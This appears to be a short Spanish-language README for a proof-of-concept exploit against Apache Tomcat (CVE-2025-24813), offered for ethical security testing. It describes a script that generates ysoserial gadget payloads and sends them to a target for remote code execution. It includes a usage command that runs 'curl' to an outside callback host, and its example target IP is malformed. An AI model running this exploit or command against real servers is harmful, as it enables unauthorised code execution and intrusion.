
Un PoC para CVE-2025-24813
CVE-2025-24813 afecta a Apache Tomcat - si es una versión vulnerable y está espectacularmente mal configurado, un atacante puede obtener RCE con un GET y un POST.
Más información aquí
Este es el script de Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng del reciente informe modificado para aceptar un comando, generar todos los payloads de gadgets de ysoserial y enviarlos a tu objetivo.
Compartido en interés de las pruebas de seguridad éticas.
Ejemplo de uso:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 muestra el script en acción, generando los payloads y enviándolos al objetivo, y en el panel derecho vemos que el listener de interact está siendo llamado.